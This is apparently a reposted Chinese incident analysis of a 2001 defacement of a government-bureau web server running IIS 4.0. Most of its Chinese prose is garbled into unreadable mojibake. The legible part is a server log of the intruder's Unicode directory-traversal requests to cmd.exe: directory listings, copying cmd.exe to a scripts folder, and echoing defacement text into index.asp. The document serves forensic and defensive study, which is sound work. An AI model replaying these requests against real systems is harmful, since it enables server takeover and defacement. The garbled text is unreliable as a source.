µ±Ç°Î»ÖãºLinux½Ì³Ì - Linux - ÃÀ¹úºÚ¿ÍÊÇÈçºÎÏ®»÷ÖйúÍøÕ¾µÄ£¿

ÃÀ¹úºÚ¿ÍÊÇÈçºÎÏ®»÷ÖйúÍøÕ¾µÄ£¿



         ¡¾ChinaByte ×ÛºÏÏûÏ¢¡¿
    ¡¡¡¡×÷ÕߣºÖìСӢÎÒÊÇ°²Â繫˾µÄ°²È«¹¤³Ìʦ¡£×î½üÃÀ¹úºÚ¿ÍÒòײ»úʼþ¶ÔÎÒ¹úһЩÕþ¸®ÍøÕ¾·¢¶¯¹¥»÷£¬À´ÊÆÐ×ÃÍ£¬ÎÒ¹«Ë¾°²È«½ô¼±ÏìÓ¦ÖÐÐÄÒѾ­½Óµ½7¡¢8¸öÕâÑùµÄ°¸Àý¡£

    ¡¡¡¡¸ù¾ÝÎÒÃǶÔÕâЩ°¸ÀýµÄÈëÇÖ¹ý³Ì·ÖÎö£¬·¢ÏÖÃÀ¹úºÚ¿Í²¢Ã»ÓвÉÓ÷dz£¸ßÃ÷µÄÊֶΣ¬¶ø´ó¶àÊÇÑ¡ÔñÈõÕߣ¬ÕÒÄÇЩ°²È«·À»¤´ëÊ©×öµÃºÜÉÙµÄÍøÕ¾½øÐй¥»÷£¬ÆäÖÐÓõ½Á˼¸¸öΣº¦ºÜ´óµÄ°²È«Â©¶´£¬ÏÂÃæµÄÒ»¸öÀý×ÓÔÚÎÒ¹úºÜ¶àÍøÕ¾É϶¼ºÜ³£¼û¡£Ï£Íû¹óÍøͨ¹ý»¥ÁªÍøýÌåµÄÐÎʽ£¬½«ÀàËÆÕâÑùµÄÈëÇÖ°¸ÀýÅú¶³öÀ´£¬ÒýÆð´ó¼ÒµÄ¾¯¾õ£¬²¢²Éȡʵ¼Ê´ëÊ©¼ÓÒÔ·À»¤¡£Ï£Íû»¥ÁªÍøýÌå²»½ö½öÈÈÖÐÓÚ±¨µÀ¹¥»÷ʼþ£¬Ò²½«Ò»Ð©Öصã·Åµ½°²È«·À»¤ÉÏÀ´£¬ÕâÑù¼ÈÓÐÐÂÎżÛÖµ£¬ÓÖÄܶԶÁÕßÌṩ°ïÖú¡£Ð»Ð»£¡

    ¡¡¡¡¹ØÓÚwww.xxxx.xxx.cnµÄÈëÇÖ·ÖÎö

    ¡¡¡¡Ò»£ºÊ¼þ±³¾°

    ¡¡¡¡¹ã¶«Ä³ÊÐC¾ÖËùÊôÍøÕ¾www.xxx.com.cn (IP: 61.xxx.xxx.17)ÓÚ2001Äê4ÔÂÆÚ¼äÔâµ½ºÚ¿Í¶ñÒâ¹¥»÷£¬Ôì³ÉÍøÕ¾ÍøÒ³±»Ð޸ġ£ÔÚ´ËÇé¿öÏ£¬ÉîÛÚÊа²Âç¿Æ¼¼ÓÐÏÞ¹«Ë¾ÓÚ2001Äê4ÔÂ17ÈÕÊÜijÊÐS¾ÖµÄίÍÐ,Ç°Íù»ú·¿ÏÖ³¡È¡Ö¤¡£

    ¡¡¡¡¶þ£º·þÎñÆ÷»ù±¾Çé¿öÒÔ¼°ÒÑ»ñÈ¡×ÊÁϸ÷þÎñÆ÷²Ù×÷ϵͳΪWindows Nt Server 4.0,°²×°ÓÐIIS 4.0 ,¶ÔÍâʹÓÃFIREWALLÆÁ±Î,Ö»¿ª·ÅWEB·þÎñ¡£ÎÒ·½¼¼ÊõÔ±ÊÕ¼¯»ñµÃMS IIS 4.0 2001Äê4ÔÂ13ÈÕÖÁ 4ÔÂ17ÈÕHTTPLOG ºÍFTPLOG¡£

    ¡¡¡¡Èý£º·ÖÎö

    ¡¡¡¡ÓÉÓÚ¸ÃÕ¾ÊÜÈëÇÖºóµÄÖ±½ÓÏÖÏóΪÍøÒ³±»ÐÞ¸Ä. ²¢ÇÒ¸ÃÕ¾Êܵ½PIX FIREWALL·ÀÎÀ,¶ÔÍâÖ»¿ª·Å80¶Ë¿Ú,ËùÒÔ³õ²½¹À¼ÆÊÇͨ¹ýIISÔ¶³Ì©¶´»ñµÃϵͳ¿ØÖÆȨµÄ,IIS 4.0ĬÈÏÏ´æÔÚism.dll,msadcs.dll,unicodeµÈ»ñµÃÍøÒ³ÐÞ¸ÄȨÏÞµÄÔ¶³Ì©¶´¡£ÓÚÊÇÎÒ¹«Ë¾¼¼ÊõÈËÔ±¶Ô¸Ã·þÎñÆ÷µÄMS IIS 4.0 2001Äê8ÔÂ17ÈÕÖÁ 4ÔÂ17ÈÕHTTPLOGÈÕÖ¾Îļþ½øÐÐÏêϸµÄ·ÖÎöºÍ¹ýÂË£¬µÃ³öÒÔϽáÂÛ£º

    ¡¡¡¡ÈëÇÖÕßÀûÓÃunicode©¶´,´Ó¶ø¿ÉÒÔʹÓÃweb¶Ë¿ÚÌá½»Ö´ÐÐÃüÁîµÄÇëÇó,ÐÞ¸ÄÍøÕ¾Ö÷Ò³¡£

    ¡¡¡¡×¢£ºÂ©¶´ÏêϸÐÅÏ¢Çë¼û£º http://www.cnns.net/article/db/822.htm

    ¡¡¡¡±»¸ü¸ÄµÄÒ³ÃæÈçÏÂ:

    ¡¡¡¡ÒÔÏÂΪÈëÇÖÕßµÄÈëÇÖÐÐΪ¼Ç¼£º

    ¡¡¡¡ÆäÖТ٣ºÈëÇÖÕßIP ¢Ú £ºÈÕÆÚ ¢Û£ºÊ±¼ä ¢Ü£ºÊ¹Ó÷½·¨ ¢Ý£º±»·ÃÎÊURL

    ¡¡¡¡¢Þ·þÎñÆ÷·µ»ØºÅ

    ¡¡¡¡Èç¹û¢Þ·þÎñÆ÷·µ»ØºÅΪ200ÔòÈëÇÖÕ߳ɹ¦ÀûÓÃunicode©¶´Ö´ÐÐÁËÃüÁî¡£

    ¡¡¡¡¢Ù ¢Ú ¢Û ¢Ü ¢Ý ¢Þ

    ¡¡¡¡152.158.208.65 01-4-17 4:34:19 GET /scripts/..ü€€€€?./winnt/system32/cmd.exe, /c+dir+c: 500

    ¡¡¡¡152.158.208.65 01-4-17 4:34:19 GET /scripts/..?../winnt/system32/cmd.exe, /c+dir+c: 500

    ¡¡¡¡152.158.208.65 01-4-17 4:34:19 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200

    ¡¡¡¡152.158.208.65 01-4-17 4:34:19 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe, /c+dir+c: 200

    ¡¡¡¡152.158.208.65 01-4-17 4:34:19 GET /scripts/..../winnt/system32/cmd.exe, /c+dir+c: 200

    ¡¡¡¡152.158.208.65 01-4-17 4:34:21 GET /scripts/..../winnt/system32/cmd.exe, /c+dir+c: 200

    ¡¡¡¡152.158.208.65 01-4-17 4:34:21 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200

    ¡¡¡¡152.158.208.65 01-4-17 4:34:21 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200

    ¡¡¡¡152.158.208.65 01-4-17 4:34:21 GET /_vti_bin/../../winnt/system32/cmd.exe, /c+dir+c: 200

    ¡¡¡¡152.158.208.65 01-4-17 4:34:23 GET /scripts/..../winnt/system32/cmd.exe, /c+dir+c: 200

    ¡¡¡¡152.158.208.65 01-4-17 4:34:23 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200

    ¡¡¡¡152.158.208.65 01-4-17 4:34:23 GET /scripts/..ð€€?./winnt/system32/cmd.exe, /c+dir+c: 500

    ¡¡¡¡152.158.208.65 01-4-17 4:34:23 GET /msadc/../../../../../../winnt/system32/cmd.exe, /c+dir+c: 200

    ¡¡¡¡152.158.208.65 01-4-17 4:34:25 GET /scripts/..o../winnt/system32/cmd.exe, /c+dir+c: 404

    ¡¡¡¡152.158.208.65 01-4-17 4:34:25 GET /scripts/..?../..?../mssql7/install/pubtext.bat"+&+dir+c: 403

    ¡¡¡¡152.158.208.65 01-4-17 4:34:25 GET /scripts/..ø€€€?./winnt/system32/cmd.exe, /c+dir+c: 500

    ¡¡¡¡152.158.208.65 01-4-17 4:34:25 GET /à€?./winnt/system32/cmd.exe, /c+dir+c: 404

    ¡¡¡¡152.158.208.65 01-4-17 5:21:17 GET /scripts/..../winnt/system32/cmd.exe, /c+set 502

    ¡¡¡¡152.158.208.65 01-4-17 5:21:37 GET /scripts/..../winnt/system32/cmd.exe,

    ¡¡¡¡/c+copy+c:winntsystem32cmd.exe+c:Inetpubscripts1.exe 502

    ¡¡¡¡152.158.208.65 01-4-17 5:24:32 GET /scripts/..../Inetpub/scripts/1.exe, /c+dir+c: 200

    ¡¡¡¡152.158.208.65 01-4-17 5:24:38 GET /scripts/..../Inetpub/scripts/1.exe, /c+set 502

    ¡¡¡¡152.158.208.65 01-4-17 5:24:49 GET /scripts/..../Inetpub/scripts/1.exe,

    ¡¡¡¡/c+dir+C:InetPubwwwrootfastinfo 200

    ¡¡¡¡152.158.208.65 01-4-17 5:25:10 GET /scripts/..../Inetpub/scripts/1.exe,

    ¡¡¡¡/c+echo+rty>C:InetPubwwwrootfastinfoindex.asp 502

    ¡¡¡¡152.158.208.65 01-4-17 5:25:19 GET /index.asp 200

    ¡¡¡¡152.158.208.65 01-4-17 5:25:37 GET /scripts/..../Inetpub/scripts/1.exe, 502

    ¡¡¡¡

    ¡¡¡¡/c+echo+^^^join+us:+[email protected]^^^^^^^^^^^^^^^^^^^^^^[SecurityNewsPortal.com]^^^^^^^^^>C:InetPubwwwrootfastinf

    ¡¡¡¡oindex.asp 502

    ¡¡¡¡152.158.208.65 01-4-17 5:25:43 GET /index.asp 200

    ¡¡¡¡´ÓÒÔÉÏ·ÖÎöÎÒÃÇ¿ÉÒÔÇå³þµÄ¿´µ½ÔÚ2001Äê4ÔÂ17ÈÕÀ´×ÔͬһIPµÄÈëÇÖÕßÊÔͼʹÓÃunicode©¶´Ô¶³ÌÖ´ÐÐÃüÁ´ïµ½ÐÞ¸ÄÍøÒ³µÄÄ¿µÄ¡£

    ¡¡¡¡¹¥»÷ʱ¼äΪ: 2001Äê4ÔÂ17ÈÕ4:34:19£­2001Äê4ÔÂ17ÈÕ5:25:43

    ¡¡¡¡ÈëÇÖÕßIPµØַΪ£º 152.158.208.65 À´×ÔÓÚÃÀ¹ú

    ¡¡¡¡ËÄ£º½áÂÛ

    ¡¡¡¡ÈëÇÖÕßÊÇÀûÓÃUnicodeÔ¶³Ì©¶´»ñµÃϵͳ¿ØÖÆȨ£¬¶à´ÎÔ¶³ÌÖ´ÐÐÃüÁÁ˽â·þÎñÆ÷½á¹¹ºó£¬ÐÞ¸ÄÍøÕ¾Ö÷Ò³¡£

    ¡¡¡¡Ëø¶¨IPΪ£º 152.158.208.65 À´×ÔÓÚÃÀ¹ú

    ¡¡¡¡¹¥»÷ʱ¼äΪ£º 2001Äê4ÔÂ17ÈÕ4:34:19£­2001Äê4ÔÂ17ÈÕ5:25:43

    ¡¡¡¡ÈëÇÖÕßÎïÀíµØַΪÃÀ¹ú

    ·¢²¼ÈË:Crystal À´×Ô:LinuxFab